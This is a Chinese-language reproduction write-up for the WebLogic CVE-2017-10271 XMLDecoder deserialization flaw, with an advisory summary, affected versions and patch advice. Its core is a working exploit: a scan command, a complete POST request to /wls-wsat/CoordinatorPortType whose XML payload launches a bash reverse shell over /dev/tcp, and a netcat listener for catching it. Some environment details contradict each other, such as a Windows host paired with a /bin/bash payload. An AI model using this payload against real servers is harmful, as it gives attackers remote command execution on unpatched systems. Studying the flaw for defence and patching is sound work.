weblogic_10.3.6_unserialize _CVE-2017-10271
说明 | 内容 |
---|---|
漏洞编号 | CVE-2017-10271 |
漏洞名称 | Weblogic 10.3.6反序列化漏洞 |
漏洞评级 | 高危 |
影响范围 | WebLogic Server 10.3.6.0 WebLogic Server 12.1.3.0 WebLogic Server 12.2.1.3 WebLogic Server 12.2.1.4 WebLogic Server 14.1.1.0 |
漏洞描述 | Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 |
修复方案 | 更新官网补丁 |
漏洞描述
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
漏洞等级
高危
影响版本
- Oracle WebLogic Server 10.3.6.0
- Oracle WebLogic Server 12.1.3.0
- Oracle WebLogic Server 12.2.1.3
- Oracle WebLogic Server 12.2.1.4
- Oracle WebLogic Server 14.1.1.0
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | windows server 2016 |
Web Server | chrome |
weblogic | 10.3.6. |
漏洞扫描
使用nacs工具进行扫描
sudo ./nacs -h 192.168.117.163 -pa 7001
漏洞验证
-
访问到/wls-wsat/CoordinatorPortType页面,进行抓包
http://192.168.117.163:7001/wls-wsat/CoordinatorPortType
-
修改为POST请求,修改Content-Type为text/xml,发送POC数据包
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.117.163:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: zbx_sessionid=49238ed3d29ae14f3a4d158dfa8c26cf; ADMINCONSOLESESSION=0SvVk3LQ3j5nxTC5CnGJnMLGrzhmhLLW2Lnj1SqsWp2fllTs7QMD!890617266 Connection: close Content-Type: text/xml Content-Length: 638 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.117.163/21 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
-
dnslog反弹
深度利用
GetShell
-
将反弹shell语句加入poc(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误)
<string>bash -i >& /dev/tcp/192.168.117.163/21 0>&1</string>
-
kali开启监听,监听21端口
nc -lnvp 21
-
发包,反弹shell
漏洞挖掘
网络测绘
weblogic
修复建议
更新官网补丁